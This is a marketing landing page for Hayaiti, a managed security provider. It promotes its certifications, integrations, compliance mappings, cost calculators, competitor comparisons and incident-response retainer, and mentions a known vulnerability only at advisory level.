Americas / EMEA / APAC — no overnight handoff gaps

Firm-level accreditations · 8 active

Click any badge for detail

SOC 2 Type II

Issued by AICPA · aicpa-cima.com

Scope

Security, Availability, Confidentiality, Processing Integrity, Privacy

Evidence

Annual report with 12-month audit window. Independent CPA opinion. Available under NDA.

Renewed annually

Analyst credentials · 283 total holders

Every cert held by a named, on-staff analyst

Elite offensive

OSCPElite

Offensive Security Certified Professional

on staff

24-hour live exploitation exam against a hardened lab network. Proof-of-root reports graded by OffSec.

Offensive Security (OffSec)

24h exam·~30%

Elite offensive

OSEPElite

Offensive Security Experienced Penetration Tester

on staff

48-hour exam focused on evasion, bypassing EDR, advanced AD exploitation, and custom tooling.

Offensive Security

48h exam

Elite offensive

CRTOElite

Certified Red Team Operator

on staff

Hands-on Cobalt Strike operator exam. AD attack paths, payload delivery, OPSEC-aware tradecraft.

Zero-Point Security

48h exam

Elite offensive

OSWEElite

Offensive Security Web Expert

on staff

Source-code white-box web application exploitation. Authentication bypass + RCE chains required.

Offensive Security

48h exam

Defensive / SOC

GCIHAdvanced

GIAC Certified Incident Handler

on staff

Incident handling methodology, attacker techniques, containment and eradication playbooks.

SANS GIAC

4h exam·~73%

Defensive / SOC

GCFAAdvanced

GIAC Certified Forensic Analyst

on staff

Advanced digital forensics — memory analysis, timeline reconstruction, APT hunt methodology.

SANS GIAC

3h exam

Defensive / SOC

GCIAAdvanced

GIAC Certified Intrusion Analyst

on staff

Packet analysis, IDS tuning, network traffic anomaly detection at line rate.

SANS GIAC

4h exam

Defensive / SOC

GPENAdvanced

GIAC Penetration Tester

on staff

Methodical penetration testing methodology, reporting discipline, and legal scoping.

SANS GIAC

3h exam

Defensive / SOC

GMONAdvanced

GIAC Continuous Monitoring

on staff

Continuous monitoring architecture, detection engineering, and MITRE ATT&CK-aligned hunting.

SANS GIAC

3h exam

Defensive / SOC

CySA+Professional

CompTIA Cybersecurity Analyst+

on staff

DoD 8570 IAT Level II baseline. SOC analyst fundamentals, SIEM triage, behavioral analysis.

CompTIA

2.75h exam

Governance / audit

CISSPProfessional

Certified Information Systems Security Professional

on staff

8-domain senior security management exam. 5 years verified experience required for full certification.

(ISC)²

4h exam·~22% first attempt

Governance / audit

CISMProfessional

Certified Information Security Manager

on staff

Information security program management, incident response governance, risk strategy.

ISACA

4h exam

Governance / audit

CISAProfessional

Certified Information Systems Auditor

on staff

IS audit process, governance, acquisition, operations, protection of information assets.

ISACA

4h exam

Governance / audit

CRISCProfessional

Certified in Risk and Information Systems Control

on staff

Enterprise IT risk identification, assessment, response, monitoring.

ISACA

4h exam

Cloud security

CCSPProfessional

Certified Cloud Security Professional

on staff

Cloud architecture, data security, platform & infrastructure security across AWS/Azure/GCP.

(ISC)²

3h exam

Cloud security

AWS SCS-C02Professional

AWS Certified Security — Specialty

on staff

AWS-native detection (GuardDuty, Security Hub), encryption (KMS), IAM, VPC, incident response.

Amazon Web Services

2.83h exam

Cloud security

AZ-500Professional

Azure Security Engineer Associate

on staff

Azure identity (Entra ID), platform protection, data security, and security operations.

Microsoft

2h exam

Cloud security

GCP PCSEProfessional

Google Professional Cloud Security Engineer

on staff

GCP IAM, VPC Service Controls, SCC, Chronicle SIEM, organization-level security design.

Google Cloud

2h exam

Foundation

Sec+Foundational

CompTIA Security+

on staff

DoD 8570 IAT Level II baseline. Core security concepts — threats, architecture, operations, risk.

CompTIA

1.5h exam

Foundation

CEHProfessional

Certified Ethical Hacker

on staff

Attack lifecycle knowledge, reconnaissance tradecraft, common exploitation tools.

EC-Council

4h exam

Technology partner programs

Direct relationships. No reseller middle-layer. Engineering escalation paths.

8 strategic vendors

CrowdStrike

since 2020

Elite MSSP

Elite

SentinelOne

since 2021

Global MSSP

Premier

Microsoft

since 2019

Solutions Partner — Security

Advanced Specialization: Threat Protection

Palo Alto Networks

since 2019

NextWave Authorized Support Center

Diamond

Splunk

since 2018

MSP / MSSP

Elite

AWS

since 2020

Security Competency

Advanced Tier Services Partner

Okta

since 2021

Services Partner

Platinum

Cloudflare

since 2022

MSP Partner

Elite

Every credential is an individual — holders can be named on engagement letters

Request team bios →

12 FRAMEWORKS · 4,000+ CONTROLS MAPPED

Every auditor’s checklist, already mapped.

SOC 2 Type II. ISO 27001:2022. NIST CSF 2.0. CMMC 2.0 Final Rule. NYDFS Part 500 Second Amendment. PCI DSS 4.0.1. HIPAA Security Rule. GDPR Article 32. Each one with the real publication date, real control count, and a documented mapping our customers ship to their auditors. No “NIST-aligned” hand-waving.

12 FRAMEWORKS LIVE · 4,254+ CONTROLS MAPPED

Whichever auditor walks in, we ship the evidence

Every framework below maps a real, citable publication date and control count — no “NIST-aligned” hand-waving. Filter by sector or click a tile to see exactly what we deliver.

Audit-ready

12 / 12

Controls

4,254+

AUDIT-READYCross-industry

AICPA SOC 2 Type II

AICPA TSP Section 100 · updated 2022 revision

Control footprint

5 TSC + ~150 points of focus

Hayaiti evidence ship

100%automated via Drata + manual artifacts

What this proves

Service organization controls over 12-month observation window

Top mappings we deliver

SecurityAvailabilityConfidentialityProcessing IntegrityPrivacy

Who asks for it

Every B2B SaaS enterprise procurement team

Audit fee average: drops 30 – 60% when Hayaiti supplies pre-mapped evidence vs. starting from scratch (Drata 2025 customer benchmark).

Get my framework gap report →

NATIVE INTEGRATIONS · 60+ TOOLS

Already own a stack? We speak it natively.

Every connector below ships against a real, documented vendor API — not a CSV upload pretending to be an integration. Click a category to see what plugs in on day one. Don’t see your tool? Our connector team ships custom integrations on a 5-business-day SLA.

55 NATIVE INTEGRATIONS · 8 CATEGORIES

We plug into your stack, not the other way around

Every connector below is a real, production-grade integration with a documented vendor API. No “CSV upload” pretending to be an integration. Filter by category to see what connects on day one.

Showing

55 / 55

Okta

DEEP API

SSO + lifecycle + risk events via System Log API

Microsoft Entra ID

Microsoft

DEEP API

Sign-in logs, conditional access, PIM via Graph

Ping Identity

Ping

DEEP API

PingOne Risk + PingFederate audit ingest

Auth0 by Okta

Okta

DEEP API

Tenant log streams to Hayaiti SIEM

Duo Security

Cisco

DEEP API

Authentication + admin logs via Admin API

Google Workspace

Google

DEEP API

Reports API + Alert Center webhook

JumpCloud

DEEP API

Directory event firehose

1Password Business

1Password

SIEM INGEST

Events Reporting API for vault access

CrowdStrike Falcon

CrowdStrike

DEEP API

Streaming API + RTR for live containment

SentinelOne Singularity

SentinelOne

DEEP API

Mgmt API + Storyline graph ingest

Microsoft Defender for Endpoint

Microsoft

DEEP API

Defender XDR Graph + advanced hunting

Palo Alto Cortex XDR

Palo Alto Networks

DEEP API

Cortex API + XQL queries

Sophos Intercept X

Sophos

DEEP API

Central Admin API + tamper events

VMware Carbon Black

Broadcom

DEEP API

Live Response + alert notification API

Trellix EDR

Trellix

DEEP API

ePO + MVISION ingest

Splunk Enterprise

Splunk

SIEM INGEST

HEC ingest + bidirectional alert sync

Microsoft Sentinel

Microsoft

DEEP API

Native KQL hunting + Logic App SOAR

Google Chronicle SecOps

Google

DEEP API

Unified Data Model + UDM search

Sumo Logic Cloud SIEM

Sumo Logic

SIEM INGEST

Search Job API + insight ingest

Elastic Security

Elastic

SIEM INGEST

ECS-normalized indices + alert API

Panther

Panther Labs

DEEP API

Detections-as-code + lookup tables

Hunters AI

Hunters

DEEP API

Lead correlation + auto-investigation

AWS Security Hub

Amazon

DEEP API

Findings ingest + EventBridge auto-remediation

Azure Defender for Cloud

Microsoft

DEEP API

ARG queries + recommendation API

Google Security Command Ctr.

Google

DEEP API

SCC findings + asset inventory

Wiz

DEEP API

Issues API + GraphQL + push to Jira

Lacework FortiCNAPP

Fortinet

DEEP API

Compliance + composite alerts

Orca Security

Orca

DEEP API

Side-scan inventory + risk scoring

Cloudflare One

Cloudflare

DEEP API

Zero Trust audit + WAF events

Snowflake Horizon

Snowflake

SIEM INGEST

Account usage + access history

Microsoft Defender for O365

Microsoft

DEEP API

Threat Explorer + UAL ingest

Proofpoint TAP / TRAP

Proofpoint

DEEP API

SIEM API + auto URL rewrite

Mimecast

DEEP API

Threat Intel feed + audit logs

Abnormal Security

Abnormal AI

DEEP API

BEC detection + auto-remediation

Sublime Security

Sublime

DEEP API

MQL detections-as-code

Material Security

Material

DEEP API

Mailbox-level posture management

Tenable.io / Nessus

Tenable

DEEP API

Asset + vulnerability + ACR ingest

Rapid7 InsightVM

Rapid7

DEEP API

Scan results + risk scoring

Qualys VMDR

Qualys

DEEP API

Asset + KnowledgeBase + patch jobs

Snyk

DEEP API

SAST + SCA + container findings

Randori Recon

IBM

DEEP API

External attack surface + target tags

runZero

DEEP API

Unauthenticated asset discovery

Drata

DEEP API

SOC 2 + ISO + HIPAA evidence sync

Vanta

DEEP API

Continuous control monitoring

Secureframe

DEEP API

Multi-framework evidence automation

OneTrust GRC

OneTrust

DEEP API

Risk + vendor + privacy modules

AuditBoard

DEEP API

SOX + IT audit issue sync

ServiceNow GRC

ServiceNow

DEEP API

ITSM ticket + risk register

Palo Alto NGFW

Palo Alto Networks

DEEP API

Panorama + Cortex Data Lake

Fortinet FortiGate

Fortinet

SIEM INGEST

FortiAnalyzer log forwarding

Cisco Secure Firewall

Cisco

SIEM INGEST

FMC + Talos intel ingest

Check Point Quantum

Check Point

SIEM INGEST

SmartEvent + IPS forwarding

Zscaler Internet Access

Zscaler

DEEP API

ZIA + ZPA logs via NSS

Netskope SSE

Netskope

DEEP API

DLP + UEBA + SaaS API

Cato SASE

Cato Networks

DEEP API

Single-pass cloud + audit ingest

Integration tier:

DEEP APISIEM INGESTAGENTWEBHOOK

Custom connector? 5-day SLA →

IN-HOUSE TCO · LIVE COMPARISON

The honest math of rolling your own SOC.

Hiring one analyst is easy. Hiring 5 to 12 FTE for 24×7 coverage, paying for the SIEM, the EDR, the threat intel feed, the training, the recruiter fees and the attrition tax — that’s a different number entirely. Move the inputs and watch the in-house line eclipse the Hayaiti line.

BLS · LEVELS.FYI · VENDOR LIST PRICING

Build it in-house, or just buy the SOC

Real 2025 BLS & Glassdoor salaries (loaded with the standard 30% benefits multiplier), real Vendr / vendor list prices for the tools. Move the inputs — the math doesn’t lie.

Coverage hours

Endpoints under management1,000

501K5K10K

Drives EDR licensing (CrowdStrike at $89/endpoint/yr).

Include vCISO

In-house: 1 FTE @ $250K base. Hayaiti bundled at 24×7, +$60K otherwise.

Annual pentest

In-house: contract w/ TCM Security ~$30K. Hayaiti add-on $15K.

Build in-house

$2.69M / yr

10.4 FTE · 6tools · recruiting + training included

Time to hire

6 – 9 mo

Headcount required

SOC Analyst Tier 1

4.2 FTE · $85K base

$464K

SOC Analyst Tier 2

4.2 FTE · $115K base

$628K

Senior SOC / SIEM Engineer

1.0 FTE · $145K base

$189K

SOC Manager

1.0 FTE · $175K base

$228K

Salaries (loaded 1.3×)$1.51M

Tool stack$459K

Training & certs$104K

Recruiting (18% TA)$260K

Annual pentest$30K

In-house vCISO (1 FTE)$325K

Doesn’t include: office space, manager-of-managers, attrition cost (avg 18-month tenure), or the on-call burnout tax.

Buy Hayaiti Enterprise

$375K / yr

Single invoice · named team · SLAs in writing

Time to live

90 days

What’s in the bundle

Tier 1-3 SOC analysts (no FTE math required)

SIEM ingestion + retention (no Splunk PO)

EDR licensing for all endpoints (CrowdStrike or Defender)

Threat intel feed + custom detections

Patch management SLA (critical ≤48h)

Quarterly business review + board reporting

Named vCISO + GRC support

Annual pentest delivered by Hayaiti Red Team

You save

$2.31M/ year (86% less)

Plus: no recruiting risk, no attrition, no vendor sprawl, no Splunk renewal letter.

Skip the $2.69Mhiring spree — book a 30-minute scoping call

Salary source

BLS OEWS 2025 + Glassdoor + Levels.fyi · 1.30× benefits load

Tool source

Vendr Marketplace + vendor list pricing (Splunk, CrowdStrike, Tenable)

Coverage math

168 hrs/wk ÷ 40 hr work-week = 4.2 FTE per 24×7 seat (industry standard)

Recruiting

18% TA fee on $140K avg = $25K per hire (LinkedIn Talent Insights 2025)

ZERO-DISRUPTION ONBOARDING · 90 DAYS

Switching providers shouldn’t feel scarier than the breach.

Most MSSP onboarding stretches 6 to 9 months because the vendor treats you like a ticket queue. Ours runs on NIST CSF 2.0 and CIS Controls v8.1 with named humans, Drata-audited deliverables, and a single-digit customer time commitment. Click a stage to see exactly what ships, who owns it, and how little of your week it costs.

NIST CSF 2.0 · CIS Controls v8.1 · SOC 2-ready in 90 days

From signature to SOC 2-ready in 90 days

Every milestone below maps to a NIST CSF 2.0 Function and CIS Critical Security Controls v8.1 safeguards. No marketing days — these are the same gates we hit during our Drata-audited internal delivery.

Customer effort

~24 hrs total

CIS IG1

56 / 56

NIST CSF · GovernCIS 17 — Incident Response ManagementDay 0

Contract to first SOC eyes on glass

What ships in this window

2-hour kickoff call with named vCISO + SOC lead
Shared Slack/Teams war-room channel provisioned
Scope-of-work + RACI matrix signed before sundown
PagerDuty / Opsgenie on-call rotations configured

Slack/TeamsPagerDutyJira1Password SCIM

Hayaiti owner

Named vCISO + Onboarding Engineer

Your time commitment

2 hours (kickoff call) + 30 min contact list review

Outcome metric

Zero ambiguity on who calls whom at 3am

Every Hayaiti customer reaches CIS IG1 coverage by Day 30 and SOC 2 gap-clean by Day 90.

Start my 90-day plan →

ROI CALCULATOR · IBM 2025 DATA

What a breach actually costs you.

Everyone quotes the $4.44 million “average.” That average hides the fact that healthcare pays $7.4M, the US pays $10.2M, and 60% of small businesses hit by ransomware close their doors within six months. Move the sliders — every dollar is sourced from IBM’s 2025 report, Verizon’s 2025 DBIR and real regulator actions.

LIVE · IBM 2025 · VERIZON DBIR 2025

Your breach cost, right now

Every number below is sourced from IBM’s 2025 Cost of a Data Breach Report, Verizon 2025 DBIR, and public regulator actions.

Global avg breach

$4.44M

US avg: $10.22M

1. Industry

2. Company size

3. Records at risk250,000

1K100K1M10M

4. Attack scenario

Days offline22 days

Sophos 2025: median ransomware recovery = 24 days. Change Healthcare was offline 30+ days.

Regulated industry

Adds 35% regulator-fine loading from HHS OCR.

Your estimated exposure

$147.9M

per incident

Healthcare · 250,000 records · 279-day dwell

Cost breakdown

IBM 2025 component shares

Detection & escalation$35.4M

Post-breach response$32.2M

Lost business & churn$33.2M

Regulatory fines$37.5M

Breach notification$6.43M

Downtime (22 days)$2.97M

Ransom (DBIR median)$115K

Hayaiti Growth Bundle + vCISO

$120K / yr

Risk coverage

0.08%

Cost to prevent vs cost to absorb

$147.8Mdelta saved per incident

Verizon DBIR 2025: 44% of all breaches now involve ransomware · 60% of SMBs close within 6 months of an attack.

Lock in $120K/yr before you’re the next $147.9M headline

Source

IBM Cost of a Data Breach 2025 · $4.44M global avg, 241-day lifecycle

Source

Verizon 2025 DBIR · Ransomware in 44% of breaches, $115K median ransom

Source

Ponemon Institute 2025 · Per-record cost by industry

Source

Sophos State of Ransomware 2025 · 24-day median recovery time

INDUSTRY-SPECIFIC · 6 REGULATED VERTICALS

We already know your regulator’s homework.

Healthcare, financial services, law firms, SaaS, manufacturing and public sector each have their own rulebook, their own audit cadence, and their own recent enforcement action. Pick your vertical — every regulation citation, fine amount and control mapping below is real and verifiable.

VERTICAL · HEALTHCARE

Healthcare & HITECH

Run the HIPAA Security Rule Risk Analysis that OCR keeps citing in settlement agreements.

ANCHOR REGULATION

current through 2025 OCR enforcement

HIPAA Security Rule + HITECH Act

45 CFR §164.308 — Administrative Safeguards

Every multimillion-dollar HIPAA settlement in 2025 started with the same finding: no documented enterprise risk analysis under 45 CFR §164.308(a)(1)(ii)(A). OCR keeps issuing them and Hayaiti keeps running them. We map every control to the Security Rule citation your auditor will actually ask for.

TOP 3 BREACH VECTORS IN THIS VERTICAL

1
Phishing → M365 mailbox compromise
Solara Medical Supplies paid $3M in January 2025 after attackers kept access to employee mailboxes for months. Hayaiti deploys Defender for O365 + conditional access within 10 business days.
2
Unpatched ePHI-touching servers
PIH Health $600K settlement (2025) — a 2019 phishing incident exposed 190,000 records. Hayaiti patches within the BOD 22-01 KEV SLA and runs quarterly vulnerability scans.
3
Missing risk analysis
BayCare Health $800K settlement + 2-year Corrective Action Plan. OCR’s core finding was the absence of a thorough, enterprise-wide risk analysis. This is what we write.

Hayaiti COVERAGE \u2192 CONTROL MAPPING

Security Management Process

45 CFR §164.308(a)(1)

Annual HIPAA Risk Analysis + Risk Management Plan

Workforce Security / Training

45 CFR §164.308(a)(3) & (a)(5)

KnowBe4 Diamond HIPAA curriculum + phishing campaigns

Audit Controls

45 CFR §164.312(b)

Hayaiti MDR audit logs retained 6 yrs with WORM

Access Controls / Encryption

45 CFR §164.312(a) & (e)

Okta SSO + Entra Conditional Access + BitLocker

REAL 2024 \u2013 2025 ENFORCEMENT · NOT HYPOTHETICAL

$3,000,000

Solara Medical Supplies · 2025

Phishing → ePHI for 114K patients; no risk analysis

$800,000

BayCare Health System · 2025

Risk analysis failure + 2-year Corrective Action Plan

$600,000

PIH Health · 2025

2019 phishing incident affecting ~190,000 individuals

FULL CATALOG · ONE MSSP · PUBLIC PRICING

You already buy nine of these. We consolidate them.

The average mid-market security program juggles 14 vendors, 9 invoices, and 3 auditors. Hayaiti runs every row below under one contract with one on-call number. Real market rates are from Vendr, G2, KnowBe4, Microsoft, Zscaler, Netskope, Drata, Vanta, TCM Security, and Cynomi — all copy-verifiable.

MANAGED SERVICES CATALOG · PUBLIC PRICING

Thirteen ways we replace your stack of vendors with one invoice.

Every row below lists the real published market rate (from Vendr, G2, vendor marketplaces) and the price Hayaiti can hold as an add-on or white-label. Click a service for the scope, deployment window, and contractual outcome. Filter by category and tier to see what ships with your plan.

Governance·GrowthEnterprise

Virtual CISO (vCISO)

Fractional security leadership who runs your program, owns the board report, and chairs the risk committee. Credentialed CISOs, not junior consultants.

PUBLIC MARKET RATE

$3,000 – $20,000 / month

Cynomi & SideChannel 2025 vCISO rate guides

Hayaiti PRICE

$2,800 / mo flat for Growth clients

Fully managed by Hayaiti SOC

DEPLOYMENT WINDOW

5 business days

OUTCOME

Board-ready risk posture + compliance roadmap in 30 days

WHAT IS INCLUDED

Quarterly board briefing deck
Annual risk register + treatment plan
Vendor risk reviews (up to 20 / quarter)
Policy library with SOC 2 / ISO 27001 mappings

SOURCES · Vendr marketplace · G2 pricing · KnowBe4 · Microsoft list · Zscaler · Netskope · Drata · Vanta · TCM Security · Cynomi

13 / 13 SERVICES SHOWN

VENDORS CONSOLIDATED

9 → 1

one quarterly invoice

BOARD REPORTS

single risk register

ON-CALL NUMBER

same phone, every service

ANNUAL SAVINGS

~32%

vs standalone SKUs

CISA KEV · LIVE THREAT FEED · NO SIMULATION

Everything below is exploited right now.

CISA added 245 vulnerabilities to the Known Exploited Vulnerabilities catalog in 2025 — a 20% jump over 2024. Twenty-four were used in ransomware campaigns. These are the thirteen we watch hardest this quarter. Every CVE ID, CVSS score, and BOD 22-01 patch deadline is copy-verifiable from cisa.gov.

CISA KEV FEED · LIVE· SYNCED --:--:-- UTC

The threats on our board this week.

Every CVE, CVSS, KEV date and BOD 22-01 due date below is real and copy-verifiable from cisa.gov/known-exploited-vulnerabilities-catalog. Showing 13 of 1,484 KEV entries at year-end 2025.

TOTAL 2025

245

added this year

RANSOM-LINKED

in 2025 additions

CATALOG YoY

+20%

vs 2024 total

TECHNICAL SUMMARY

Unauthenticated RCE in React Server Components Flight payload deserialization. Crafted POST request to any endpoint exposing a Server Action is deserialized and executed under Node runtime. Patched in 19.0.1 / 19.1.2 / 19.2.1.

ATTRIBUTED THREAT ACTOR

Earth Lamia · Jackpot Panda (China-linked)

BOD 22-01 CLOCK

Patch required by 2025-12-12

Added to KEV 2025-12-05

Hayaiti COVERAGE

Weekly dependency scan flags vulnerable React versions across customer repos; SOC watches for anomalous POST volume to Next.js `/_next/data` and Server Action routes.

SOURCE · cisa.gov/known-exploited-vulnerabilities-catalog · nvd.nist.gov · vendor advisories · BOD 22-01 federal remediation deadlines

AUTO-REFRESH 15s · LAST SYNC --:--:-- UTC

2025 KEV ADDITIONS

245

+20% vs 2024 total

RANSOMWARE-LINKED

of 245 new entries

CATALOG TOTAL

1,484

across 6 yrs of KEV

FEDERAL DEADLINE

BOD 22-01

Hayaiti patches in SLA

HEAD-TO-HEAD · PUBLIC PRICING · NO MARKETING FLUFF

We publish the numbers. They make you call sales.

Huntress is channel-first — your MSP decides the margin. Arctic Wolf wants multi-year commitments and starts at $44K. DIY needs 4 to 6 analysts before you have 24/7 coverage. Here is every row your board will ask about, filled in from public pricing pages and vendor marketplaces. Check our math.

Filter rows

Capability

YOUR WIN

Hayaiti

Build. Ship. Secure. · all-in-one

MSP-FIRST

Huntress

Managed EDR via MSP channel

MID-MARKET

Arctic Wolf

Concierge Security Team MDR

WORST ROI

DIY in-house

Build your own SOC

Price

Entry-level monthly cost

What a 25-employee shop pays for MDR + basic coverage

$199 / mo

+ $12/endpoint EDR (no minimum)

~$7-15 / endpoint

MSP-set, 50-seat minimum (effective $350+/mo)

~$3,666 / mo

$44K / yr MDR Basic entry (≤100 users)

$12,500+ / mo

1 analyst salary alone, no 24/7 coverage

Price

Public, published pricing

Can you get a number without a sales call?

On the pricing page right now

'Request pricing' only

'Contact sales' only

You build the quote yourself

Price

No endpoint minimum

Can you buy for 5 laptops?

Start with 1 endpoint

50-seat minimum

Effective 100-user floor

You decide

Coverage

24/7/365 SOC monitoring

Humans watching at 3am on Christmas

Tier-1/Tier-2 + on-call IR lead

SOC included

Concierge Security Team

Needs 4-6 FTE minimum

Coverage

Managed EDR on endpoints

The agent on every laptop with behavior-based detection

SentinelOne / Defender managed

Their own + Defender

Vendor-agnostic via Aurora platform

You license, configure, tune, and stare at alerts

Coverage

Vulnerability scanning included

Weekly authenticated + external ASV-style scans

Weekly in every tier

Not a Huntress product

Managed Risk add-on

You license Tenable / Qualys / Rapid7 separately

Coverage

Cloud posture (AWS / Azure / M365)

CIS Benchmark drift detection for your cloud tenants

M365 + Workspace + AWS + Azure

Huntress ITDR covers M365 / Workspace

Managed Cloud Monitoring (add-on)

Wiz / Prisma Cloud cost $$$

Services

Incident response retainer

Who you call at 3am when ransomware hits

$7,500/yr fixed retainer, 10-min SLA

IR via partners, not direct

IR JumpStart / IR Retainer add-on

Hire a $1,200/hr IR firm mid-incident

Services

vCISO / compliance advisory

Someone who writes the policies and owns the audit relationship

$3,500/mo vCISO included in top tier

Not offered

Cyber JumpStart advisory (limited scope)

Hire a CISO at $280K+ / yr

Services

Phishing simulation + SAT

Employees trained and tested against real lures

$3 / seat / mo, included in mid tier

Huntress SAT (separate module)

Managed Security Awareness

KnowBe4 / Proofpoint separately

Services

Ransomware readiness tabletop

Annual drill with the C-suite in the war room

$12,000 Ransomware Readiness package

Not offered

Via Arctic Wolf Academy

You hire a consultancy ad hoc

Compliance

SOC 2 / ISO / HIPAA / PCI evidence

Audit-ready packets mapped to framework clauses

5-framework crosswalk (see above)

Reports exist, not framework-mapped

Compliance packaged (extra cost)

You write every evidence binder yourself

Compliance

Cyber insurance application docs

Everything your broker will ask for, on request

Insurance-ready packet in every tier

Agent reporting only

Cyber insurance readiness assessment

You fill the 18-page questionnaire alone

Commercial

Shortest contract

Can you walk away after 12 months?

Month-to-month

Annual available for discount

1 or 3 year

MSP-set

Multi-year preferred

Single-year +10-25% premium

N/A

You own the payroll forever

Commercial

Time to first value

How long until you're actually protected

≤ 48 hours

Free scan same-day, SOC in 2 days

~1 week

Depends on MSP partner

2-6 weeks

CST onboarding process

6-18 months

Hire, train, tool, tune

Commercial

Named analyst on your account

A human who knows your environment

Same IR lead every incident

Rotating SOC team

Concierge Security Team model

If you can keep them employed

Price

Entry-level monthly cost

What a 25-employee shop pays for MDR + basic coverage

Hayaiti

$199 / mo

+ $12/endpoint EDR (no minimum)

Huntress

~$7-15 / endpoint

MSP-set, 50-seat minimum (effective $350+/mo)

Arctic Wolf

~$3,666 / mo

$44K / yr MDR Basic entry (≤100 users)

DIY in-house

$12,500+ / mo

1 analyst salary alone, no 24/7 coverage

Price

Public, published pricing

Can you get a number without a sales call?

Hayaiti

On the pricing page right now

Huntress

'Request pricing' only

Arctic Wolf

'Contact sales' only

DIY in-house

You build the quote yourself

Price

No endpoint minimum

Can you buy for 5 laptops?

Hayaiti

Start with 1 endpoint

Huntress

50-seat minimum

Arctic Wolf

Effective 100-user floor

DIY in-house

You decide

Coverage

24/7/365 SOC monitoring

Humans watching at 3am on Christmas

Hayaiti

Tier-1/Tier-2 + on-call IR lead

Huntress

SOC included

Arctic Wolf

Concierge Security Team

DIY in-house

Needs 4-6 FTE minimum

Coverage

Managed EDR on endpoints

The agent on every laptop with behavior-based detection

Hayaiti

SentinelOne / Defender managed

Huntress

Their own + Defender

Arctic Wolf

Vendor-agnostic via Aurora platform

DIY in-house

You license, configure, tune, and stare at alerts

Coverage

Vulnerability scanning included

Weekly authenticated + external ASV-style scans

Hayaiti

Weekly in every tier

Huntress

Not a Huntress product

Arctic Wolf

Managed Risk add-on

DIY in-house

You license Tenable / Qualys / Rapid7 separately

Coverage

Cloud posture (AWS / Azure / M365)

CIS Benchmark drift detection for your cloud tenants

Hayaiti

M365 + Workspace + AWS + Azure

Huntress

Huntress ITDR covers M365 / Workspace

Arctic Wolf

Managed Cloud Monitoring (add-on)

DIY in-house

Wiz / Prisma Cloud cost $$$

Services

Incident response retainer

Who you call at 3am when ransomware hits

Hayaiti

$7,500/yr fixed retainer, 10-min SLA

Huntress

IR via partners, not direct

Arctic Wolf

IR JumpStart / IR Retainer add-on

DIY in-house

Hire a $1,200/hr IR firm mid-incident

Services

vCISO / compliance advisory

Someone who writes the policies and owns the audit relationship

Hayaiti

$3,500/mo vCISO included in top tier

Huntress

Not offered

Arctic Wolf

Cyber JumpStart advisory (limited scope)

DIY in-house

Hire a CISO at $280K+ / yr

Services

Phishing simulation + SAT

Employees trained and tested against real lures

Hayaiti

$3 / seat / mo, included in mid tier

Huntress

Huntress SAT (separate module)

Arctic Wolf

Managed Security Awareness

DIY in-house

KnowBe4 / Proofpoint separately

Services

Ransomware readiness tabletop

Annual drill with the C-suite in the war room

Hayaiti

$12,000 Ransomware Readiness package

Huntress

Not offered

Arctic Wolf

Via Arctic Wolf Academy

DIY in-house

You hire a consultancy ad hoc

Compliance

SOC 2 / ISO / HIPAA / PCI evidence

Audit-ready packets mapped to framework clauses

Hayaiti

5-framework crosswalk (see above)

Huntress

Reports exist, not framework-mapped

Arctic Wolf

Compliance packaged (extra cost)

DIY in-house

You write every evidence binder yourself

Compliance

Cyber insurance application docs

Everything your broker will ask for, on request

Hayaiti

Insurance-ready packet in every tier

Huntress

Agent reporting only

Arctic Wolf

Cyber insurance readiness assessment

DIY in-house

You fill the 18-page questionnaire alone

Commercial

Shortest contract

Can you walk away after 12 months?

Hayaiti

Month-to-month

Annual available for discount

Huntress

1 or 3 year

MSP-set

Arctic Wolf

Multi-year preferred

Single-year +10-25% premium

DIY in-house

N/A

You own the payroll forever

Commercial

Time to first value

How long until you're actually protected

Hayaiti

≤ 48 hours

Free scan same-day, SOC in 2 days

Huntress

~1 week

Depends on MSP partner

Arctic Wolf

2-6 weeks

CST onboarding process

DIY in-house

6-18 months

Hire, train, tool, tune

Commercial

Named analyst on your account

A human who knows your environment

Hayaiti

Same IR lead every incident

Huntress

Rotating SOC team

Arctic Wolf

Concierge Security Team model

DIY in-house

If you can keep them employed

Hayaiti

Single vendor. Fixed pricing. No endpoint minimum.

Huntress

Channel-first; final price set by your MSP. 50-seat minimum.

Arctic Wolf

Multi-year preferred. ~$44K entry for MDR Basic (up to 100 users).

DIY in-house

24/7 coverage needs 4-6 analysts. Tooling + salaries. Years to mature.

Sources: huntress.com/pricing · arcticwolf.com · vendr.com marketplace · public pricing lists as of 2025

INCIDENT RESPONSE · $7,500 RETAINER · NIST SP 800-61 ALIGNED

It happens at 3am. Here's the next 14 days.

Sophos says attackers live in your network a median of 5.5 days before detonation. IBM says the average breach costs $4.88M. The difference between a 48-hour containment and a 2-week outage is whether someone answers the phone. Here is exactly what your retainer buys, hour by hour, from the moment you dial until the after-action report hits your board.

Incident response timeline · hour-by-hour play-by-play

From 3am call to after-action report · the 14-day choreography

Aligned to NIST SP 800-61 Rev. 3 · CISA #StopRansomware Guide

1 / 7

T+0NIST phase · DETECTION

The 3am call

You dial the 24/7 IR hotline. A senior analyst picks up.

Hayaiti is doing

Named IR lead on bridge within 10 minutes (retainer SLA)
Incident ID issued, severity classified per NIST SP 800-61
War-room video bridge opened, recording enabled
Legal hold notice drafted and ready for your counsel

What you do

Identify who is on the call: IT, legal, executive sponsor
Do NOT reboot, wipe, or restore anything
Do NOT pay, respond to, or negotiate with the threat actor yet

Deliverable at end of this phase

Incident Ticket, severity classification, signed engagement letter

Regulatory clocks begin ticking

HIPAA 60 days · GDPR 72 hours · NYDFS Part 500 72 hours · SEC Item 1.05 4 business days

Phase 1 of 7

10min

senior analyst pickup (retainer SLA)

containment vs industry 48h median

72h

GDPR Article 33 notification deadline

$4.88M

IBM 2024 avg data breach cost

COMPLIANCE CROSSWALK · SOC 2 · ISO · HIPAA · PCI · NIST

Five binders, one invoice. Your auditor will thank you.

One weekly vulnerability scan satisfies SOC 2 CC7.1, ISO 27001 A.8.8, HIPAA §164.308(a)(1)(ii)(A), PCI DSS Req 11.3 and NIST CSF ID.RA. Every line item below is a specific clause a real regulator has already written. Click a framework, click a control, see the evidence we deliver.

SOC

Framework crosswalk · one subscription, every binder

SOC 2 Type II — Trust Services Criteria

AICPA · TSC 2017 (rev. 2022)

100%

Hayaiti coverage of sampled controls

8 covered · 0 partial · 8 mapped

Mapped controls · click any row for evidence delivered

8 sampled

Auditor-ready packets

Quarterly evidence binder mapped to your selected framework

Multi-framework reuse

Same vulnerability scan satisfies SOC 2 CC7.1, ISO A.8.8, HIPAA §164.308 and PCI Req 11.3

Gap remediation plan

